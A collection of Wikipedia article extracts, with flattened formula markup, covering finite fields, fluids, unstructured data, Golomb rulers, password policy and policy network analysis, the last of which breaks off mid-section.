When the nonzero elements ofGF(q){\displaystyle \mathrm {GF} (q)}are represented by their discrete logarithms, multiplication and division are easy, as they reduce to addition and subtraction moduloq−1{\displaystyle q-1}. However, addition amounts to computing the discrete logarithm ofam+an{\displaystyle a^{m}+a^{n}}. The identityam+an=an(am−n+1){\displaystyle a^{m}+a^{n}=a^{n}\left(a^{m-n}+1\right)}allows one to solve this problem by constructing the table of the discrete logarithms ofan+1{\displaystyle a^{n}+1}, calledZech's logarithms, forn=0,…,q−2{\displaystyle n=0,\ldots ,q-2}(it is convenient to define the discrete logarithm of zero as being−∞{\displaystyle -\infty }).
Zech's logarithms are useful for large computations, such aslinear algebraover medium-sized fields, that is, fields that are sufficiently large for making natural algorithms inefficient, but not too large, as one has to pre-compute a table of the same size as the order of the field.
Every nonzero element of a finite field is aroot of unity, asxq−1=1{\displaystyle x^{q-1}=1}for every nonzero element ofGF(q){\displaystyle \mathrm {GF} (q)}.
Ifn{\displaystyle n}is a positive integer, ann{\displaystyle n}thprimitive root of unityis a solution of the equationxn=1{\displaystyle x^{n}=1}that is not a solution of the equationxm=1{\displaystyle x^{m}=1}for any positive integerm<n{\displaystyle m<n}. Ifa{\displaystyle a}is an{\displaystyle n}th primitive root of unity in a fieldF{\displaystyle F}, thenF{\displaystyle F}contains all then{\displaystyle n}roots of unity, which are1,a,a2,…,an−1{\displaystyle 1,a,a^{2},\ldots ,a^{n-1}}.
The fieldGF(q){\displaystyle \mathrm {GF} (q)}contains an{\displaystyle n}th primitive root of unity if and only ifn{\displaystyle n}is a divisor ofq−1{\displaystyle q-1}; ifn{\displaystyle n}is a divisor ofq−1{\displaystyle q-1}, then the number of primitiven{\displaystyle n}th roots of unity inGF(q){\displaystyle \mathrm {GF} (q)}isϕ(n){\displaystyle \phi (n)}(Euler's totient function). The number ofn{\displaystyle n}th roots of unity inGF(q){\displaystyle \mathrm {GF} (q)}isgcd(n,q−1){\displaystyle \mathrm {gcd} (n,q-1)}.
In a field of characteristicp{\displaystyle p}, everynp{\displaystyle np}th root of unity is also an{\displaystyle n}th root of unity. It follows that primitivenp{\displaystyle np}th roots of unity never exist in a field of characteristicp{\displaystyle p}.
On the other hand, ifn{\displaystyle n}iscoprimetop{\displaystyle p}, the roots of then{\displaystyle n}thcyclotomic polynomialare distinct in every field of characteristicp{\displaystyle p}, as this polynomial is a divisor ofXn−1{\displaystyle X^{n}-1}, whosediscriminantnn{\displaystyle n^{n}}is nonzero modulop{\displaystyle p}. It follows that then{\displaystyle n}thcyclotomic polynomialfactors overGF(q){\displaystyle \mathrm {GF} (q)}into distinct irreducible polynomials that have all the same degree, sayd{\displaystyle d}, and thatGF(pd){\displaystyle \mathrm {GF} (p^{d})}is the smallest field of characteristicp{\displaystyle p}that contains then{\displaystyle n}th primitive roots of unity.
When computingBrauer characters, one uses the mapαk↦exp(2πik/(q−1)){\displaystyle \alpha ^{k}\mapsto \exp(2\pi ik/(q-1))}to map eigenvalues of a representation matrix to the complex numbers. Under this mapping, the base subfieldGF(p){\displaystyle \mathrm {GF} (p)}consists of evenly spaced points around the unit circle (omitting zero).
The fieldGF(64){\displaystyle \mathrm {GF} (64)}has several interesting properties that smaller fields do not share: it has two subfields such that neither is contained in the other; not all generators (elements withminimal polynomialof degree6{\displaystyle 6}overGF(2){\displaystyle \mathrm {GF} (2)}) are primitive elements; and the primitive elements are not all conjugate under theGalois group.
The order of this field being26, and the divisors of6being1, 2, 3, 6, the subfields ofGF(64)areGF(2),GF(22) = GF(4),GF(23) = GF(8), andGF(64)itself. As2and3arecoprime, the intersection ofGF(4)andGF(8)inGF(64)is the prime fieldGF(2).
The union ofGF(4)andGF(8)has thus10elements. The remaining54elements ofGF(64)generateGF(64)in the sense that no other subfield contains any of them. It follows that they are roots of irreducible polynomials of degree6overGF(2). This implies that, overGF(2), there are exactly9 =54/6irreduciblemonic polynomialsof degree6. This may be verified by factoringX64−XoverGF(2).
The elements ofGF(64)are primitiven{\displaystyle n}th roots of unity for somen{\displaystyle n}dividing63{\displaystyle 63}. As the 3rd and the 7th roots of unity belong toGF(4)andGF(8), respectively, the54generators are primitiventh roots of unity for somenin{9, 21, 63}.Euler's totient functionshows that there are6primitive9th roots of unity,12{\displaystyle 12}primitive21{\displaystyle 21}st roots of unity, and36{\displaystyle 36}primitive63rd roots of unity. Summing these numbers, one finds again54{\displaystyle 54}elements.
By factoring thecyclotomic polynomialsoverGF(2){\displaystyle \mathrm {GF} (2)}, one finds that:
This shows that the best choice to constructGF(64){\displaystyle \mathrm {GF} (64)}is to define it asGF(2)[X] / (X6+X+ 1). In fact, this generator is a primitive element, and this polynomial is the irreducible polynomial that produces the easiest Euclidean division.
In this section,p{\displaystyle p}is a prime number, andq=pn{\displaystyle q=p^{n}}is a power ofp{\displaystyle p}.
InGF(q){\displaystyle \mathrm {GF} (q)}, the identity(x+y)p=xp+ypimplies that the mapφ:x↦xp{\displaystyle \varphi :x\mapsto x^{p}}is aGF(p){\displaystyle \mathrm {GF} (p)}-linear endomorphismand afield automorphismofGF(q){\displaystyle \mathrm {GF} (q)}, which fixes every element of the subfieldGF(p){\displaystyle \mathrm {GF} (p)}. It is called theFrobenius automorphism, afterFerdinand Georg Frobenius.
Denoting byφkthecompositionofφwith itselfktimes, we haveφk:x↦xpk.{\displaystyle \varphi ^{k}:x\mapsto x^{p^{k}}.}It has been shown in the preceding section thatφnis the identity. For0 <k<n, the automorphismφkis not the identity, as, otherwise, the polynomialXpk−X{\displaystyle X^{p^{k}}-X}would have more thanpkroots.
There are no otherGF(p)-automorphisms ofGF(q). In other words,GF(pn)has exactlynGF(p)-automorphisms, which areId=φ0,φ,φ2,…,φn−1.{\displaystyle \mathrm {Id} =\varphi ^{0},\varphi ,\varphi ^{2},\ldots ,\varphi ^{n-1}.}
In terms ofGalois theory, this means thatGF(pn)is aGalois extensionofGF(p), which has acyclicGalois group.
The fact that the Frobenius map is surjective implies that every finite field isperfect.
IfFis a finite field, a non-constantmonic polynomialwith coefficients inFisirreducibleoverF, if it is not the product of two non-constant monic polynomials, with coefficients inF.
As everypolynomial ringover a field is aunique factorization domain, every monic polynomial over a finite field may be factored in a unique way (up to the order of the factors) into a product of irreducible monic polynomials.
There are efficient algorithms for testing polynomial irreducibility and factoring polynomials over finite fields. They are a key step for factoring polynomials over the integers or therational numbers. At least for this reason, everycomputer algebra systemhas functions for factoring polynomials over finite fields, or, at least, over finite prime fields.
The polynomialXq−X{\displaystyle X^{q}-X}factors into linear factors over a field of orderq. More precisely, this polynomial is the product of all monic polynomials of degree one over a field of orderq.
This implies that, ifq=pnthenXq−Xis the product of all monic irreducible polynomials overGF(p), whose degree dividesn. In fact, ifPis an irreducible factor overGF(p)ofXq−X, its degree dividesn, as itssplitting fieldis contained inGF(pn). Conversely, ifPis an irreducible monic polynomial overGF(p)of degreeddividingn, it defines a field extension of degreed, which is contained inGF(pn), and all roots ofPbelong toGF(pn), and are roots ofXq−X; thusPdividesXq−X. AsXq−Xdoes not have any multiple factor, it is thus the product of all the irreducible monic polynomials that divide it.
This property is used to compute the product of the irreducible factors of each degree of polynomials overGF(p); seeDistinct degree factorization.
The numberN(q,n)of monic irreducible polynomials of degreenoverGF(q)is given by[5]N(q,n)=1n∑d∣nμ(d)qn/d,{\displaystyle N(q,n)={\frac {1}{n}}\sum _{d\mid n}\mu (d)q^{n/d},}whereμis theMöbius function. This formula is an immediate consequence of the property ofXq−Xabove and theMöbius inversion formula.
By the above formula, the number of irreducible (not necessarily monic) polynomials of degreenoverGF(q)is(q− 1)N(q,n).
The exact formula implies the inequalityN(q,n)≥1n(qn−∑ℓ∣n,ℓprimeqn/ℓ);{\displaystyle N(q,n)\geq {\frac {1}{n}}\left(q^{n}-\sum _{\ell \mid n,\ \ell {\text{ prime}}}q^{n/\ell }\right);}this is sharp if and only ifnis a power of some prime.
For everyqand everyn, the right hand side is positive, so there is at least one irreducible polynomial of degreenoverGF(q).
Incryptography, the difficulty of thediscrete logarithm problemin finite fields or inelliptic curvesis the basis of several widely used protocols, such as theDiffie–Hellmanprotocol. For example, in 2014, a secure internet connection to Wikipedia involved the elliptic curve Diffie–Hellman protocol (ECDHE) over a large finite field.[6]Incoding theory, many codes are constructed assubspacesofvector spacesover finite fields.
Finite fields are used by manyerror correction codes, such asReed–Solomon error correction codeorBCH code. The finite field almost always has characteristic of2, since computer data is stored in binary. For example, a byte of data can be interpreted as an element ofGF(28). One exception isPDF417bar code, which isGF(929). Some CPUs have special instructions that can be useful for finite fields of characteristic2, generally variations ofcarry-less product.
Finite fields are widely used innumber theory, as many problems over the integers may be solved by reducing themmoduloone or severalprime numbers. For example, the fastest known algorithms forpolynomial factorizationandlinear algebraover the field ofrational numbersproceed by reduction modulo one or several primes, and then reconstruction of the solution by usingChinese remainder theorem,Hensel liftingor theLLL algorithm.
Similarly many theoretical problems in number theory can be solved by considering their reductions modulo some or all prime numbers. See, for example,Hasse principle. Many recent developments ofalgebraic geometrywere motivated by the need to enlarge the power of these modular methods.Wiles' proof of Fermat's Last Theoremis an example of a deep result involving many mathematical tools, including finite fields.
TheWeil conjecturesconcern the number of points onalgebraic varietiesover finite fields and the theory has many applications includingexponentialandcharacter sumestimates.
Finite fields have widespread application incombinatorics, two well known examples being the definition ofPaley Graphsand the related construction forHadamard Matrices. Inarithmetic combinatoricsfinite fields[7]and finite field models[8][9]are used extensively, such as inSzemerédi's theoremon arithmetic progressions.
Adivision ringis a generalization of field. Division rings are not assumed to be commutative. There are no non-commutative finite division rings:Wedderburn's little theoremstates that all finitedivision ringsare commutative, and hence are finite fields. This result holds even if we relax theassociativityaxiom toalternativity, that is, all finitealternative division ringsare finite fields, by theArtin–Zorn theorem.[10]
A finite fieldF{\displaystyle F}is not algebraically closed: the polynomialf(T)=1+∏α∈F(T−α),{\displaystyle f(T)=1+\prod _{\alpha \in F}(T-\alpha ),}has no roots inF{\displaystyle F}, sincef(α) = 1for allα{\displaystyle \alpha }inF{\displaystyle F}.
Given a prime numberp, letF¯p{\displaystyle {\overline {\mathbb {F} }}_{p}}be an algebraic closure ofFp.{\displaystyle \mathbb {F} _{p}.}It is not only uniqueup toan isomorphism, as do all algebraic closures, but contrarily to the general case, all its subfield are fixed by all its automorphisms, and it is also the algebraic closure of all finite fields of the same characteristicp.
This property results mainly from the fact that the elements ofFpn{\displaystyle \mathbb {F} _{p^{n}}}are exactly the roots ofxpn−x,{\displaystyle x^{p^{n}}-x,}and this defines an inclusionFpn⊂Fpnm{\displaystyle \mathbb {\mathbb {F} } _{p^{n}}\subset \mathbb {F} _{p^{nm}}}form>1.{\displaystyle m>1.}These inclusions allow writing informallyF¯p=⋃n≥1Fpn.{\displaystyle {\overline {\mathbb {F} }}_{p}=\bigcup _{n\geq 1}\mathbb {F} _{p^{n}}.}The formal validation of this notation results from the fact that the above field inclusions form adirected setof fields; Itsdirect limitisF¯p,{\displaystyle {\overline {\mathbb {F} }}_{p},}which may thus be considered as "directed union".
Given aprimitive elementgmn{\displaystyle g_{mn}}ofFqmn,{\displaystyle \mathbb {F} _{q^{mn}},}thengmnm{\displaystyle g_{mn}^{m}}is a primitive element ofFqn.{\displaystyle \mathbb {F} _{q^{n}}.}
For explicit computations, it may be useful to have a coherent choice of the primitive elements for all finite fields; that is, to choose the primitive elementgn{\displaystyle g_{n}}ofFqn{\displaystyle \mathbb {F} _{q^{n}}}in order that, whenevern=mh,{\displaystyle n=mh,}one hasgm=gnh,{\displaystyle g_{m}=g_{n}^{h},}wheregm{\displaystyle g_{m}}is the primitive element already chosen forFqm.{\displaystyle \mathbb {F} _{q^{m}}.}
Such a construction may be obtained byConway polynomials.
Although finite fields are not algebraically closed, they arequasi-algebraically closed, which means that everyhomogeneous polynomialover a finite field has a non-trivial zero whose components are in the field if the number of its variables is more than its degree. This was a conjecture ofArtinandDicksonproved byChevalley(seeChevalley–Warning theorem).
|
https://en.wikipedia.org/wiki/Finite_field#Frobenius_automorphism_and_Galois_theory
|
Inphysics, afluidis aliquid,gas, or other material that may continuouslymoveanddeform(flow) under an appliedshear stress, or external force.[1]They have zeroshear modulus, or, in simpler terms, aresubstanceswhich cannot resist anyshear forceapplied to them.
Although the termfluidgenerally includes both the liquid and gas phases, its definition varies amongbranches of science. Definitions ofsolidvary as well, and depending on field, some substances can have both fluid and solid properties.[2]Non-Newtonian fluids likeSilly Puttyappear to behave similar to a solid when a sudden force is applied.[3]Substances with a very highviscositysuch aspitchappear to behave like a solid (seepitch drop experiment) as well. Inparticle physics, the concept is extended to include fluidicmattersother than liquids or gases.[4]A fluid in medicine or biology refers to any liquid constituent of the body (body fluid),[5][6]whereas "liquid" is not used in this sense. Sometimes liquids given forfluid replacement, either by drinking or by injection, are also called fluids[7](e.g. "drink plenty of fluids"). Inhydraulics,fluidis a term which refers to liquids with certain properties, and is broader than (hydraulic) oils.[8]
Fluids display properties such as:
These properties are typically a function of their inability to support ashear stressin staticequilibrium. By contrast, solids respond to shear either witha spring-like restoring force—meaning that deformations are reversible—or they require a certain initialstressbefore they deform (seeplasticity).
Solids respond with restoring forces to both shear stresses and tonormal stresses, bothcompressiveandtensile. By contrast, ideal fluids only respond with restoring forces to normal stresses, calledpressure: fluids can be subjected both to compressive stress—corresponding to positive pressure—and to tensile stress, corresponding tonegative pressure. Solids and liquids both have tensile strengths, which when exceeded in solids createsirreversible deformationand fracture, and in liquids cause the onset ofcavitation.
Both solids and liquids have free surfaces, which cost some amount offree energyto form. In the case of solids, the amount of free energy to form a given unit of surface area is calledsurface energy, whereas for liquids the same quantity is calledsurface tension. In response to surface tension, the ability of liquids to flow results in behaviour differing from that of solids, though at equilibrium both tend tominimise their surface energy: liquids tend to form roundeddroplets, whereas pure solids tend to formcrystals.Gases, lacking free surfaces, freelydiffuse.
In a solid, shear stress is a function ofstrain, but in a fluid,shear stressis a function ofstrain rate. A consequence of this behavior isPascal's lawwhich describes the role ofpressurein characterizing a fluid's state.
The behavior of fluids can be described by theNavier–Stokes equations—a set ofpartial differential equationswhich are based on:
The study of fluids isfluid mechanics, which is subdivided intofluid dynamicsandfluid staticsdepending on whether the fluid is in motion.
Depending on the relationship between shear stress and the rate of strain and itsderivatives, fluids can be characterized as one of the following:
Newtonian fluids followNewton's law of viscosityand may be calledviscous fluids.
Fluids may be classified by their compressibility:
Newtonian and incompressible fluids do not actually exist, but are assumed to be for theoretical settlement. Virtual fluids that completely ignore the effects of viscosity and compressibility are calledperfect fluids.
|
https://en.wikipedia.org/wiki/Fluid
|
Unstructured data(orunstructured information) is information that either does not have a pre-defineddata modelor is not organized in a pre-defined manner. Unstructured information is typicallytext-heavy, but may contain data such as dates, numbers, and facts as well. This results in irregularities andambiguitiesthat make it difficult to understand using traditional programs as compared to data stored in fielded form in databases orannotated(semantically tagged) in documents.
In 1998,Merrill Lynchsaid "unstructured data comprises the vast majority of data found in an organization, some estimates run as high as 80%."[1]It is unclear what the source of this number is, but nonetheless it is accepted by some.[2]Other sources have reported similar or higher percentages of unstructured data.[3][4][5]
As of 2012[update],IDCandDell EMCproject that data will grow to 40zettabytesby 2020, resulting in a 50-fold growth from the beginning of 2010.[6]More recently, IDC andSeagatepredict that the globaldataspherewill grow to 163 zettabytes by 2025[7]and majority of that will be unstructured. TheComputer World magazinestates that unstructured information might account for more than 70–80% of all data in organizations.[1]
The earliest research intobusiness intelligencefocused in on unstructured textual data, rather than numerical data.[8]As early as 1958,computer scienceresearchers likeH.P. Luhnwere particularly concerned with the extraction and classification of unstructured text.[8]However, only since the turn of the century has the technology caught up with the research interest. In 2004, theSAS Institutedeveloped theSASText Miner, which usesSingular Value Decomposition(SVD) to reduce ahyper-dimensionaltextualspaceinto smaller dimensions for significantly more efficient machine-analysis.[9]The mathematical and technological advances sparked bymachinetextual analysis prompted a number of businesses to research applications, leading to the development of fields likesentiment analysis,voice of the customermining, and call center optimization.[10]The emergence ofBig Datain the late 2000s led to a heightened interest in the applications of unstructured data analytics in contemporary fields such aspredictive analyticsandroot cause analysis.[11]
The term is imprecise for several reasons:
Techniques such asdata mining,natural language processing(NLP), andtext analyticsprovide different methods tofind patternsin, or otherwise interpret, this information. Common techniques for structuring text usually involve manualtagging with metadataorpart-of-speech taggingfor furthertext mining-based structuring. TheUnstructured Information Management Architecture(UIMA) standard provided a common framework for processing this information to extract meaning and create structured data about the information.
Software that creates machine-processable structure can utilize the linguistic, auditory, and visual structure that exist in all forms of human communication.[12]Algorithms can infer this inherent structure from text, for instance, by examining wordmorphology, sentence syntax, and other small- and large-scale patterns. Unstructured information can then be enriched and tagged to address ambiguities and relevancy-based techniques then used to facilitate search and discovery. Examples of "unstructured data" may include books, journals, documents,metadata,health records,audio,video,analog data, images, files, and unstructured text such as the body of ane-mailmessage,Web page, orword-processordocument. While the main content being conveyed does not have a defined structure, it generally comes packaged in objects (e.g. in files or documents, ...) that themselves have structure and are thus a mix of structured and unstructured data, but collectively this is still referred to as "unstructured data".[13]For example, anHTMLweb page is tagged, but HTML mark-up typically serves solely for rendering. It does not capture the meaning or function of tagged elements in ways that support automated processing of the information content of the page.XHTMLtagging does allow machine processing of elements, although it typically does not capture or convey the semantic meaning of tagged terms.
Since unstructured data commonly occurs inelectronic documents, the use of acontentordocument managementsystem which can categorize entire documents is often preferred over data transfer and manipulation from within the documents. Document management thus provides the means to convey structure ontodocument collections.
Search engineshave become popular tools for indexing and searching through such data, especially text.
Specific computational workflows have been developed to impose structure upon the unstructured data contained within text documents. These workflows are generally designed to handle sets of thousands or even millions of documents, or far more than manual approaches to annotation may permit. Several of these approaches are based upon the concept ofonline analytical processing, or OLAP, and may be supported by data models such as text cubes.[14]Once document metadata is available through a data model, generating summaries of subsets of documents (i.e., cells within a text cube) may be performed with phrase-based approaches.[15]
Biomedical research generates one major source of unstructured data as researchers often publish their findings in scholarly journals. Though the language in these documents is challenging to derive structural elements from (e.g., due to the complicated technical vocabulary contained within and thedomain knowledgerequired to fully contextualize observations), the results of these activities may yield links between technical and medical studies[16]and clues regarding new disease therapies.[17]Recent efforts to enforce structure upon biomedical documents includeself-organizing mapapproaches for identifying topics among documents,[18]general-purposeunsupervised algorithms,[19]and an application of the CaseOLAP workflow[15]to determine associations between protein names andcardiovascular diseasetopics in the literature.[20]CaseOLAP defines phrase-category relationships in an accurate (identifies relationships), consistent (highly reproducible), and efficient manner. This platform offers enhanced accessibility and empowers the biomedical community with phrase-mining tools for widespread biomedical research applications.[20]
In Sweden (EU), pre 2018, some data privacy regulations did not apply if the data in question was confirmed as "unstructured".[21]This terminology, unstructured data, is rarely used in the EU afterGDPRcame into force in 2018. GDPR does neither mention nor define "unstructured data". It does use the word "structured" as follows (without defining it);
GDPR Case-law on what defines a "filing system"; "the specific criterion and the specific form in which the set of personal data collected by each of the members who engage in preaching is actually structured is irrelevant, so long as that set of data makes it possible for the data relating to a specific person who has been contacted to beeasily retrieved, which is however for the referring court to ascertain in the light of all the circumstances of the case in the main proceedings.” (CJEU,Todistajat v. Tietosuojavaltuutettu, Jehovan, Paragraph 61).
Ifpersonal datais easily retrieved - then it is a filing system and - then it is in scope for GDPR regardless of being "structured" or "unstructured". Most electronic systems today,[as of?]subject to access and applied software, can allow for easy retrieval of data.
|
https://en.wikipedia.org/wiki/Unstructured_data
|
Inmathematics, aGolomb ruleris asetof marks atintegerpositions along a ruler such that no two pairs of marks are the same distance apart. The number of marks on the ruler is itsorder, and the largest distance between two of its marks is itslength. Translation and reflection of a Golomb ruler are considered trivial, so the smallest mark is customarily put at 0 and the next mark at the smaller of its two possible values. Golomb rulers can be viewed as a one-dimensional special case ofCostas arrays.
The Golomb ruler was named forSolomon W. Golomband discovered independently bySidon (1932)[1]andBabcock (1953).Sophie Piccardalso published early research on these sets, in 1939, stating as a theorem the claim that two Golomb rulers with the samedistance setmust becongruent. This turned out to be false for six-point rulers, but true otherwise.[2]
There is no requirement that a Golomb ruler be able to measurealldistances up to its length, but if it does, it is called aperfectGolomb ruler. It has been proved that no perfect Golomb ruler exists for five or more marks.[3]A Golomb ruler isoptimalif no shorter Golomb ruler of the same order exists. Creating Golomb rulers is easy, but proving the optimal Golomb ruler (or rulers) for a specified order is computationally very challenging.
Distributed.nethas completed distributed massivelyparallel searchesfor optimal order-24 through order-28 Golomb rulers, each time confirming the suspected candidate ruler.[4][5][6][7][8]
Currently, thecomplexityof finding optimal Golomb rulers (OGRs) of arbitrary ordern(wherenis given in unary) is unknown.[clarification needed]In the past there was some speculation that it is anNP-hardproblem.[3]Problems related to the construction of Golomb rulers are provably shown to be NP-hard, where it is also noted that no known NP-complete problem has similar flavor to finding Golomb rulers.[9]
A set of integersA={a1,a2,...,am}{\displaystyle A=\{a_{1},a_{2},...,a_{m}\}}wherea1<a2<...<am{\displaystyle a_{1}<a_{2}<...<a_{m}}is a Golomb ruler if and only if
Theorderof such a Golomb ruler ism{\displaystyle m}and itslengthisam−a1{\displaystyle a_{m}-a_{1}}. Thecanonical formhasa1=0{\displaystyle a_{1}=0}and, ifm>2{\displaystyle m>2},a2−a1<am−am−1{\displaystyle a_{2}-a_{1}<a_{m}-a_{m-1}}. Such a form can be achieved through translation and reflection.
Aninjective functionf:{1,2,...,m}→{0,1,...,n}{\displaystyle f:\left\{1,2,...,m\right\}\to \left\{0,1,...,n\right\}}withf(1)=0{\displaystyle f(1)=0}andf(m)=n{\displaystyle f(m)=n}is a Golomb ruler if and only if
Theorderof such a Golomb ruler ism{\displaystyle m}and itslengthisn{\displaystyle n}. The canonical form has
A Golomb ruler of ordermwith lengthnmay beoptimalin either of two respects:[11]: 237
The general termoptimal Golomb ruleris used to refer to the second type of optimality.
Golomb rulers are used withininformation theoryrelated toerror correcting codes.[13]
Golomb rulers are used in the selection of radio frequencies to reduce the effects ofintermodulation interferencewith bothterrestrial[14]andextraterrestrial[15]applications.
Golomb rulers are used in the design of phased arrays of radio antennas. In radio astronomy one-dimensional synthesis arrays can have the antennas in a Golomb ruler configuration in order to obtain minimum redundancy of the Fourier component sampling.[16][17]
Multi-ratiocurrent transformersuse Golomb rulers to place transformer tap points.[citation needed]
A number of construction methods produceasymptotically optimalGolomb rulers.
The following construction, due toPaul ErdősandPál Turán, produces a Golomb ruler for every odd prime p.[12]
The following table contains all known optimal Golomb rulers, excluding those with marks in the reverse order. The first four areperfect.
^ *The optimal ruler would have been known before this date; this date represents that date when it was discovered to be optimal (because all other rulers were proved to not be smaller). For example, the ruler that turned out to be optimal for order 26 was recorded on 10 October 2007, but it was not known to be optimal until all other possibilities were exhausted on 24 February 2009.
|
https://en.wikipedia.org/wiki/Golomb_Ruler
|
Apassword policyis a set of rules designed to enhance computer security by encouraging users to employ strongpasswordsand use them properly. A password policy is often part of an organization's official regulations and may be taught as part ofsecurity awarenesstraining. Either the password policy is merely advisory, or the computer systems force users to comply with it. Some governments have national authentication frameworks[1]that define requirements for user authentication to government services, including requirements for passwords.
The United States Department of Commerce'sNational Institute of Standards and Technology(NIST) has put out two standards for password policies which have been widely followed.
From 2004, the "NIST Special Publication 800-63. Appendix A,"[2]advised people to use irregular capitalization, special characters, and at least one numeral. This was the advice that most systems followed, and was "baked into" a number of standards that businesses needed to follow.
However, in 2017 a major update changed this advice, particularly that forcing complexity and regular changes is now seen as bad practice.[3][4]: 5.1.1.2
The key points of these are:
NIST included a rationale for the new guidelines in its Appendix A.
Typical components of a password policy include:
Many policies require a minimum password length. Eight characters is typical but may not be appropriate.[6][7][8]Longer passwords are almost always more secure, but some systems impose a maximum length for compatibility withlegacy systems.
Some policies suggest or impose requirements on what type of password a user can choose, such as:
Other systems create an initial password for the user; but require then to change it to one of their own choosing within a short interval.
Password block lists are lists of passwords that are always blocked from use. Block lists contain passwords constructed of character combinations that otherwise meet company policy, but should no longer be used because they have been deemed insecure for one or more reasons, such as being easily guessed, following a common pattern, or public disclosure from previousdata breaches. Common examples are Password1, Qwerty123, or Qaz123wsx.
Some policies require users to change passwords periodically, often every 90 or 180 days. The benefit of password expiration, however, is debatable.[9][10]Systems that implement such policies sometimes prevent users from picking a password too close to a previous selection.[11]
This policy can often backfire. Some users find it hard to devise "good" passwords that are also easy to remember, so if people are required to choose many passwords because they have to change them often, they end up using much weaker passwords; the policy also encourages users to write passwords down. Also, if the policy prevents a user from repeating a recent password, this requires that there is a database in existence of everyone's recent passwords (or theirhashes) instead of having the old ones erased from memory. Finally, users may change their password repeatedly within a few minutes, and then change back to the one they really want to use, circumventing the password change policy altogether.
The human aspects of passwords must also be considered. Unlike computers, human users cannot delete one memory and replace it with another. Consequently, frequently changing a memorized password is a strain on the human memory, and most users resort to choosing a password that is relatively easy to guess (SeePassword fatigue). Users are often advised to usemnemonicdevices to remember complex passwords. However, if the password must be repeatedly changed, mnemonics are useless because the user would not remember which mnemonic to use. Furthermore, the use of mnemonics (leading to passwords such as "2BOrNot2B") makes the password easier to guess.
Administration factors can also be an issue. Users sometimes have older devices that require a password that was used before the password duration expired.[clarification needed]In order to manage these older devices, users may have to resort to writing down all old passwords in case they need to log into an older device.
Requiring a very strong password and not requiring it be changed is often better.[12]However, this approach does have a major drawback: if an unauthorized person acquires a password and uses it without being detected, that person may have access for an indefinite period.
It is necessary to weigh these factors: the likelihood of someone guessing a password because it is weak, versus the likelihood of someone managing to steal, or otherwise acquire without guessing, a stronger password.
Bruce Schneierargues that "pretty much anything that can be remembered can be cracked", and recommends a scheme that uses passwords which will not appear in any dictionaries.[13]
Password policies may include progressive sanctions beginning with warnings and ending with possible loss of computer privileges or job termination. Where confidentiality is mandated by law, e.g. withclassified information, a violation of password policy could be a criminal offense in some jurisdictions.[14]Some[who?]consider a convincing explanation of the importance of security to be more effective than threats of sanctions[citation needed].
The level of password strength required depends, among other things, on how easy it is for an attacker to submit multiple guesses. Some systems limit the number of times a user can enter an incorrect password before some delay is imposed or the account is frozen. At the other extreme, some systems make available aspecially hashedversion of the password, so that anyone can check its validity. When this is done, an attacker can try passwords very rapidly; so much stronger passwords are necessary for reasonable security. (Seepassword crackingandpassword length equation.) Stricter requirements are also appropriate for accounts with higher privileges, such as root or system administrator accounts.
Password policies are usually a tradeoff between theoretical security and the practicalities of human behavior. For example:
A 2010 examination of the password policies of 75 different websites concludes that security only partly explains more stringent policies:monopolyproviders of a service, such as government sites, have more stringent policies than sites where consumers have choice (e.g. retail sites and banks). The study concludes that sites with more stringent policies "do not have greater security concerns, they are simply better insulated from the consequences from poor usability."[15]
Other approaches are available that are generally considered to be more secure than simple passwords. These include use of asecurity tokenorone-time passwordsystem, such asS/Key, ormulti-factor authentication.[16]However, these systems heighten the tradeoff between security and convenience: according toShuman Ghosemajumder, these systems all improve security, but come "at the cost of moving the burden to the end user."[17]
|
https://en.wikipedia.org/wiki/Password_policy
|
Policy network analysisis a field of research inpolitical sciencefocusing on the links and interdependence between government's sections and other societal actors, aiming to understand thepolicy-makingprocess andpublic policyoutcomes.[1]
Although the number of definitions is almost as large as the number of approaches of analysis,Rhodes[1]: 426aims to offer a minimally exclusive starting point: "Policy networks are sets of formal institutional and informal linkages between governmental and other actors structured around shared if endlessly negotiated beliefs and interests in public policy making and implementation."
As Thatcher[2]: 391notes, policy network approaches initially aimed to model specific forms of state-interest group relations, without giving exhaustive typologies.
The most widely used paradigm of the 1970s and 1980s only analyzed two specific types of policy networks: policy communities and issue networks. Justifications of the usage of these concepts were deduced from empirical case studies.[2]
Policy Communities in which you refer to relatively slowly changing networks defining the context of policy-making in specific policy segments. The network links are generally perceived as the relational ties between bureaucrats, politicians and interest groups. The main characteristic of policy communities – compared to issue networks – is that the boundaries of the networks are more stable and more clearly defined. This concept was studied in the context of policy-making in the United Kingdom.[2]
In contrast,issue networks– a concept established in literature about United States government - refer to a looser system, where a relatively large number of stakeholders are involved. Non-government actors in these networks usually include not only interest group representatives but also professional or academic experts. An important characteristic of issue network is that membership is constantly changing, interdependence is often asymmetric and – compared to policy communities – it is harder to identify dominant actors.[3]
New typological approaches appeared in the early 1990s and late 1980s with the aim of grouping policy networks into a system of mutually exclusive and commonly exhaustive categories.[2]One possible logic of typology is based on the degree of integration, membership size and distribution of resources in the network. This categorization – perhaps most importantly represented by R. A. W. Rhodes – allows the combination of policy communities and issue networks with categories like professional network, intragovernmental network and producer network.[4]Other approaches identify categories based on distinct patterns of state-interest group relations. Patterns include corporatism and pluralism,iron triangles, subgovernment andclientelismwhile the differentiation is based on membership, stability and sectorality.[5]
As the field of policy network analysis grew since the late 20th century, scholars developed competing descriptive, theoretical and prescriptive accounts. Each type gives different specific content for the term policy network and uses different research methodologies.[1]
For several authors, policy networks describe specific forms of government policy-making. The three most important forms are interest intermediation, interorganizational analysis, and governance.[1]
An approach developed from the literature on US pluralism, policy networks are often analyzed in order to identify the most important actors influencing governmental decision-making. From this perspective, a network-based assessment is useful to describe power positions, the structure ofoligopolyin political markets, and the institutions of interest negotiation.[1]
Another branch of descriptive literature, which emerged from the study of European politics, aims to understand the interdependency in decision-making between formal political institutions and the corresponding organizational structures. This viewpoint emphasizes the importance of overlapping organizational responsibilities and the distribution of power in shaping specific policy outcomes.[6]
A third direction of descriptive scholarship is to describe general patterns of policy-making – the formal institutions of power-sharing between government, independent state bodies and the representatives of employer and labor interests.[7][8]
The two most important theoretical approaches aiming to understand and explain actor's behavior in policy networks are the following: power dependence and rational choice.[1]
In power dependence models, policy networks are understood as mechanism of exchanging resources between organizations in the networks. The dynamic of exchange is determined by the comparative value of resources (f.e. legal, political or financial in nature) and individual capacities to deploy them in order create better bargaining positions and achieve higher degrees of autonomy.[1]
